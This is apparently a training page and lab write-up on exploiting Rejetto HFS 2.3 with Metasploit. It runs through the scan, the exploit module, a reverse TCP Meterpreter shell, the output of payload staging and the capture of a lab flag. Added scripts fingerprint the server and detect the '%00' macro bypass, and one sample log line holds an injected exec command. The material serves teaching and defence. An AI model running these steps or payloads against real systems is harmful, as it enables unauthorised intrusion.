Exploiting A Vulnerable HTTP File Server
An HTTP File Server (HFS) is a web server designed for file and document sharing.
HTTP File Servers typically listen on TCP port 80 and use HTTP as the underlying protocol.
Rejetto HFS is a popular free and open source HTTP file server that can be set up on both Windows and Linux.
Rejetto HFS v2.3 is vulnerable to remote command execution.
Metasploit (MSF) ships an exploit module that we can use to gain access to the system hosting the HFS.
Demo: Exploiting A Vulnerable HTTP File Server
The exploitation process combines everything from the previous sections. First, we port scan and enumerate the target to determine whether an HTTP File Server is running on it. We then enumerate the version of that server, which in this case should be Rejetto HFS 2.3. Finally we search for and load the matching exploit module, configure it, and run it, which should give us a Meterpreter session.
Target IP Address: 10.2.24.160
Ensure that the PostgreSQL database service is started, so that msfconsole can connect to the Metasploit Framework database and we can create workspaces.
service postgresql start
Start the Metasploit Framework console.
msfconsole
Check the database status to confirm that we are connected.
db_status
Create a workspace called HFS; after this command we are working inside it.
workspace -a HFS
Set the RHOSTS option globally with setg, so that we do not have to type the target IP every time we load a module: the global value is applied to every module loaded afterwards.
setg RHOSTS 10.2.24.160
We run an Nmap scan through db_nmap so that the results are stored directly in the Metasploit Framework database, in the current workspace, and can be analysed from msfconsole.
-sS: SYN scan (requires root privileges, as does -O).
-sV: service version detection.
-O: operating system detection.
db_nmap -sS -sV -O 10.2.24.160
Browse to port 80 on the target to confirm that HFS is indeed running.
http://10.2.24.160
The target runs Rejetto HTTP File Server version 2.3 on port 80, alongside a few other services. The Nmap scan also tells us about the operating system: the SMB banner on port 445 reports a Windows Server 2008 R2 - 2012 range (the demo identifies it as Windows Server 2008 R2; the exact build is confirmed by sysinfo once we have a session). This matters when we choose the Meterpreter payload, because the payload has to match the target platform and architecture.
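Nmap's "HttpFileServer httpd 2.3" line comes from the Server header that HFS puts on every response, so the same fingerprint can be taken with a single HTTP request. The script below is an added example, not code from the course page or from the Rejetto project: it parses that header, extracts the version and reports whether it falls in the range the Metasploit module for HFS 2.3 targets. The range bounds are an assumption built from the page (2.3) and the module's tested list (2.3b); whether later 2.3x builds are patched is not stated on the page, so adjust AFFECTED_HIGH to your own reference. The sample headers are constructed, not captured from the lab target.

```python
"""Fingerprint Rejetto HFS from its HTTP Server header (added example)."""
import http.client
import re
import sys
from typing import Optional

# Matches "Server: HFS 2.3" or "Server: HFS 2.3b"; the optional trailing
# letter is the beta/build suffix HFS uses.
HFS_SERVER_RE = re.compile(
    r"^Server:\s*HFS\s+(\d+(?:\.\d+)*[a-z]?)\s*$", re.IGNORECASE | re.MULTILINE
)

def hfs_version_from_headers(raw_headers: str) -> Optional[str]:
    """Return the HFS version from raw response headers, or None if the
    Server header is absent or names a different product."""
    m = HFS_SERVER_RE.search(raw_headers)
    return m.group(1) if m else None

def version_key(version: str):
    """Sort key ordering '2.3' < '2.3b' < '2.3c' < '2.4': the bare number
    sorts before the same number with a build letter."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", version)
    if m is None:
        raise ValueError(f"unexpected HFS version format: {version!r}")
    return tuple(int(p) for p in m.group(1).split(".")), m.group(2)

# Assumed affected range: 2.3 from the page, 2.3b from the module's tested list.
AFFECTED_LOW, AFFECTED_HIGH = "2.3", "2.3b"

def matches_module_range(version: str) -> bool:
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)

def probe(host: str, port: int = 80, timeout: float = 5.0) -> Optional[str]:
    """Send one GET / to a live host and return the HFS version string, or None."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/")
        resp = conn.getresponse()
        raw = "".join(f"{name}: {value}\r\n" for name, value in resp.getheaders())
        return hfs_version_from_headers(raw)
    finally:
        conn.close()

# Constructed sample headers (not captured from the lab target) so the parser
# can be exercised offline.
SAMPLE_HFS_HEADERS = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: HFS 2.3\r\n\r\n"
SAMPLE_IIS_HEADERS = "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/8.5\r\n\r\n"

def report(version: Optional[str]) -> str:
    if version is None:
        return "not HFS (or Server header hidden)"
    flag = "matches module range" if matches_module_range(version) else "outside module range"
    return f"HFS {version}: {flag}"

if __name__ == "__main__":
    print("offline sample:", report(hfs_version_from_headers(SAMPLE_HFS_HEADERS)))
    if len(sys.argv) > 1:  # usage: python3 hfs_fingerprint.py 10.0.19.137 [port]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        print(sys.argv[1], report(probe(sys.argv[1], port)))
```

Note that a hidden or rewritten Server header only defeats this banner check, not the exploit, so treat a None result on an HFS-looking page as "unknown" rather than "not affected".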
Now that we know which HTTP File Server is running and its version, we can search for a matching exploit module directly from msfconsole.
search type:exploit name:rejetto
Load the module, review its options and description, and run it.
use exploit/windows/http/rejetto_hfs_exec
show options
info
run
It automatically opens a Meterpreter session.
meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x86/windows
meterpreter > exit
We obtained a Meterpreter session without setting a payload because the module has a default one (a 32-bit Meterpreter reverse TCP payload, which is why sysinfo reports Meterpreter : x86/windows on an x64 host) and LHOST is filled in automatically from our interface. Two module-specific options are worth knowing, because the exploit stages its payload over HTTP from a small web server that the module starts on our machine:
SRVHOST
: The local host to listen on. This must be an address on the local machine (or 0.0.0.0); it is where the target fetches the payload from.
SRVPORT
: The local port to listen on (8080 by default).
We can change the payload to match the target's operating system architecture.
set payload windows/x64/meterpreter/reverse_tcp
show options
run
We have a 64-bit Meterpreter session as opposed to previously, when the default payload specified was the 32-bit Meterpreter payload.
meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x64/windows
You can always customize the payload you use for every exploit module based on the target operating system, as well as the architecture.
That is how to exploit a vulnerable HTTP File Server.
Windows: HTTP File Server
Overview
A Kali GUI machine and a target machine running a vulnerable HTTP File Server server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.
Objective: Exploit the application and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1945.pdf
My own approach
Target IP Address: 10.0.19.137
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > workspace -a hfs
[*] Added workspace: hfs
[*] Workspace: hfs
msf5 > set RHOSTS 10.0.19.137
RHOSTS => 10.0.19.137
msf5 > db_nmap -sS -sV -O 10.0.19.137
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-23 17:47 IST
[*] Nmap: Nmap scan report for 10.0.19.137
[*] Nmap: Host is up (0.0029s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http HttpFileServer httpd 2.3
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/23%OT=80%CT=1%CU=34221%PV=Y%DS=3%DC=I%G=Y%TM=63CE7B2
[*] Nmap: OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.99 seconds
msf5 > hosts
Hosts
=====
address      mac  name  os_name      os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------      ---------  -----  -------  ----  --------
10.0.19.137             Windows 8.1                    client
msf5 > services
Services
========
host         port   proto  name               state  info
----         ----   -----  ----               -----  ----
10.0.19.137  80     tcp    http               open   HttpFileServer httpd 2.3
10.0.19.137  135    tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.0.19.137  445    tcp    microsoft-ds       open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.19.137  3389   tcp    ssl/ms-wbt-server  open
10.0.19.137  49152  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49153  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49154  tcp    msrpc              open   Microsoft Windows RPC
10.0.19.137  49155  tcp    msrpc              open   Microsoft Windows RPC
msf5 > search type:exploit name:rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
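As an added detection example (not code from the page or from the Metasploit module): the description above says the module reaches HFS scripting commands by sending "%00" past the filter, and the session output on this page shows a "%TEMP%\...vbs" file being cleaned up afterwards. The script below turns those two facts into checks over constructed sample data: it URL-decodes web request lines and flags a NUL byte sitting next to a macro, and it flags the HFS process spawning a script host from a Temp directory. The "{." and ".}" macro delimiters are HFS scripting syntax that the page itself does not state; the "search" parameter in the sample request and the hfs.exe process name are assumptions (the request check does not depend on the parameter name); every log line and process event is constructed.

```python
"""Detection logic for the Rejetto HFS 2.3 "%00" macro-filter bypass (added example)."""
import re
from urllib.parse import unquote_to_bytes

# HFS scripting macros are written between "{." and ".}", with "|" separating
# the command name from its arguments (HFS macro syntax; not stated on the
# page). The regex runs on bytes so a decoded NUL can sit right before it.
MACRO_RE = re.compile(rb"\{\.([A-Za-z_]+)(?:\|(.*?))?\.\}", re.DOTALL)

# Request line captured between quotes in a combined-format access log.
REQ_RE = re.compile(r'"([A-Z]+ [^ "]+ HTTP/\d\.\d)"')

def classify_request(request_line: str) -> dict:
    """Return {'macro', 'nul', 'verdict'} for one 'METHOD target HTTP/x.y' line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return {"macro": None, "nul": False, "verdict": "malformed"}
    target = unquote_to_bytes(parts[1])  # "%00" becomes a real NUL byte here
    has_nul = b"\x00" in target
    m = MACRO_RE.search(target)
    macro = m.group(1).decode("ascii") if m else None
    if macro and has_nul:
        verdict = "hfs-macro-nul-bypass"  # the shape of what the module sends
    elif macro:
        verdict = "hfs-macro"             # macro without the bypass; still worth a look
    elif has_nul:
        verdict = "nul-in-target"         # a NUL in a URL is rarely legitimate
    else:
        verdict = "benign"
    return {"macro": macro, "nul": has_nul, "verdict": verdict}

def scan_access_log(lines):
    """Return (line_number, macro, verdict) for every non-benign request."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = REQ_RE.search(line)
        if not m:
            continue
        r = classify_request(m.group(1))
        if r["verdict"] != "benign":
            hits.append((n, r["macro"], r["verdict"]))
    return hits

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}

def classify_process_event(parent_image: str, image: str, command_line: str) -> str:
    """Flag the HFS process (assumed to run as hfs.exe) spawning a script host,
    with a stronger verdict when the script lives under a Temp directory, which
    matches the %TEMP%\\<random>.vbs file the session output mentions."""
    parent = parent_image.lower().rsplit("\\", 1)[-1]
    child = image.lower().rsplit("\\", 1)[-1]
    if parent != "hfs.exe" or child not in SCRIPT_HOSTS:
        return "benign"
    cl = command_line.lower()
    if "\\temp\\" in cl and ".vbs" in cl:
        return "hfs-spawned-temp-vbs"
    return "hfs-spawned-script-host"

# Constructed sample data (not captured traffic). The "search" parameter name is
# an assumption about where the macro is placed; the checks do not depend on it.
SAMPLE_ACCESS_LOG = [
    '10.10.16.5 - - [23/Jan/2023:18:06:20 +0530] "GET / HTTP/1.1" 200 1532',
    '10.10.16.5 - - [23/Jan/2023:18:06:24 +0530] "GET /?search=%00{.exec|cmd.exe%20/c%20whoami.} HTTP/1.1" 200 0',
    '10.10.16.5 - - [23/Jan/2023:18:06:25 +0530] "GET /?search=quarterly%20report HTTP/1.1" 200 210',
]
SAMPLE_PROCESS_EVENTS = [
    (r"C:\hfs\hfs.exe", r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\Administrator\AppData\Local\Temp\AhmCpAHBTgeesQ.vbs"'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("access log line %d: macro=%s verdict=%s" % hit)
    for parent, image, cl in SAMPLE_PROCESS_EVENTS:
        print(image, "->", classify_process_event(parent, image, cl))
```

The request check runs after percent-decoding on purpose: matching the literal string "%00" would miss double-encoded or mixed-case variants, while a real NUL next to a macro is unambiguous. The process check is the more durable of the two, since it fires regardless of how the request was encoded.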
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.19.137 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Using URL: http://0.0.0.0:8080/dd0dlD
[*] Local IP: http://10.10.16.5:8080/dd0dlD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /dd0dlD
[*] Sending stage (180291 bytes) to 10.0.19.137
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.0.19.137:49623) at 2023-01-23 18:06:25 +0530
[!] Tried to delete %TEMP%\AhmCpAHBTgeesQ.vbs, unknown result
[*] Server stopped.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Using URL: http://0.0.0.0:8080/WGC9TXBGdHuXMWN
[*] Local IP: http://10.10.16.5:8080/WGC9TXBGdHuXMWN
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /WGC9TXBGdHuXMWN
[*] Sending stage (206403 bytes) to 10.0.19.137
[*] Meterpreter session 2 opened (10.10.16.5:4444 -> 10.0.19.137:49686) at 2023-01-23 18:10:06 +0530
[!] Tried to delete %TEMP%\xXApgs.vbs, unknown result
[*] Server stopped.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > search -f flag*
Found 2 results...
c:\flag.txt (32 bytes)
c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
f74c8347798f4082daf4b4570dba094a